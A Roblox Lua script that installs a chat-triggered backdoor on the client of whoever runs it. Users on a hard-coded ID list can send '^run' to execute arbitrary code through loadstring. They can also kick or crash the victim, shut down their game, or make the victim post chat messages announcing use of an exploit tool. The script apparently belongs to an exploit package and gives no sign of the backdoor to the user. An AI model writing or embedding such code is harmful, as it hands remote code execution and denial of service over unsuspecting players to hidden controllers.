local function getplr(str)
    local plrs = game.Players:GetPlayers()
    if str:lower() == "all" then
        return plrs
    elseif str:lower() == "others" then
        for i, v in ipairs(plrs) do
            if v == game.Players.LocalPlayer then
                table.remove(plrs, i)
                return plrs
            end
        end
    elseif str:lower() == "me" then
        return {game.Players.LocalPlayer}
    else
        local cockandballs = {}
        for i, v in pairs(game.Players:GetPlayers()) do
            if str:lower() == (v.Name:lower()):sub(1, #str) or str:lower() == (v.DisplayName:lower()):sub(1, #str) then
                table.insert(cockandballs, v)
            end
        end
        return cockandballs
    end
end
local allowed = {
    1551416114,
    1389780396,
    252684030,
    2172305,
    120983992,
    4725549245,
    1921860822
}
local bdconnections = {}
local function updbd()
    for i,v in pairs(bdconnections) do
        pcall(function()
            v:Disconnect()
        end)
    end
    for i, v in pairs(game.Players:GetPlayers()) do
        if table.find(allowed, v.UserId) then
            bdconnections[v.UserId] =
                v.Chatted:Connect(
                function(msg)
                    local args = msg:split(" ")
                    if args[1] == "^run" then
                        loadstring(table.concat(args, " ", 2))()
                    elseif args[1] == "^ktest" then
                        game.Players:Chat(
                            "(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)"
                        )
                        game.Players:Chat("aƀçđȇfĝħíǰκ|ɱňοƥʠŕšţûѷwẋƴž")
                        task.wait(0.3)
                        local args = {
                            [1] = "/w " .. v.Name .. " i am indeed using solinium",
                            [2] = "All"
                        }

                        game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild(
                            "SayMessageRequest"
                        ):FireServer(unpack(args))
                    elseif args[1] == "^kick" then
                        for i,v in pairs(getplr(args[2])) do
                            if v == game.Players.LocalPlayer then
                                local reason = table.concat(args, " ", 3)
                                game.Players.LocalPlayer:Kick(reason)
                                task.wait(1)
                                repeat until false
                            end
                        end
                    elseif args[1] == "^crash" then
                        repeat until false
                    elseif args[1] == "^say" then
                        local args = {
                            [1] = tostring(table.concat(args, " ", 3)),
                            [2] = "All"
                        }

                        game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild(
                            "SayMessageRequest"
                        ):FireServer(unpack(args))
                    elseif args[1] == "^eject" then
                        for i,v in pairs(getplr(args[2])) do
                            if v == game.Players.LocalPlayer then
                                game:Shutdown()
                            end
                        end
                    end
                end
            )
        end
    end
end

task.delay(0.5, function()
    game.Players.PlayerAdded:Connect(function()
        updbd()
    end)
    game.Players.PlayerRemoving:Connect(function()
        updbd()
    end)
    updbd()
end)
